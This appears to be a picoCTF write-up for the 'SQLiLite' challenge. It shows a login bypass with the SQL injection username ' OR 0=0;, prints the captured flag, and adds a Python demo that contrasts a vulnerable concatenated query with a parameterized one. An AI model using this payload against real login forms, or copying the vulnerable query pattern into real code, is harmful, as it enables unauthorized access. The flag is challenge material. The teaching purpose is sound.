SQLiLite

Author

Description

Can you login to this website?
Try to login here.

Approach

Let's try logging in with arbitrary credentials:

username: user
password: pass
SQL query: SELECT * FROM users WHERE name='user' AND password='pass'

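Interesting: the page echoes the SQL query it builds from our input. If we can get the query to select every row, we should be able to get the flag. To do that, we close the name string literal with a quote, add an OR followed by an always-true condition so that the WHERE clause matches every row, then terminate the statement with a semicolon. One username that makes this work is ' OR 0=0;. After submitting that, the response contains the following (the flag sits in a hidden p element, so it is only visible in the page source):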

<body><pre>username: ' OR 0=0;
password: 
SQL query: SELECT * FROM users WHERE name='' OR 0=0;' AND password=''
</pre><h1>Logged in! But can you see the flag, it is in plainsight.</h1><p hidden="">Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}</p></body>
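
Why this works, and how the login query should have been written, as an added example that is not part of the original write-up or the challenge's code. The table contents, function names and the `first_statement` helper are assumptions: the helper emulates a backend that runs only the first statement of the string, which the successful login above implies.

```python
import sqlite3

def make_db():
    # Constructed sample rows; the challenge's real table contents are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "constructed-pw-1"), ("guest", "constructed-pw-2")])
    return db

def first_statement(sql):
    # Assumption: the backend executes only the first complete statement and
    # ignores the tail. Python's sqlite3 rejects multi-statement strings, so
    # cut at the first ';' that SQLite itself considers a statement end
    # (a ';' inside a string literal does not count).
    for i, ch in enumerate(sql):
        if ch == ";" and sqlite3.complete_statement(sql[:i + 1]):
            return sql[:i + 1]
    return sql

def login_concat(db, name, password):
    # Vulnerable: user input is pasted into the SQL text, producing the same
    # query shape the page echoes back.
    sql = f"SELECT * FROM users WHERE name='{name}' AND password='{password}'"
    return sql, db.execute(first_statement(sql)).fetchall()

def login_param(db, name, password):
    # Hardened: placeholders keep input as data, so quotes and semicolons
    # in the username are compared literally and never parsed as SQL.
    sql = "SELECT * FROM users WHERE name=? AND password=?"
    return sql, db.execute(sql, (name, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 0=0;"  # the username from the write-up
    sql, rows = login_concat(db, payload, "")
    print(sql)
    print("concatenated query rows:", len(rows))
    print("parameterized query rows:", len(login_param(db, payload, "")[1]))
```
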

Flag

picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}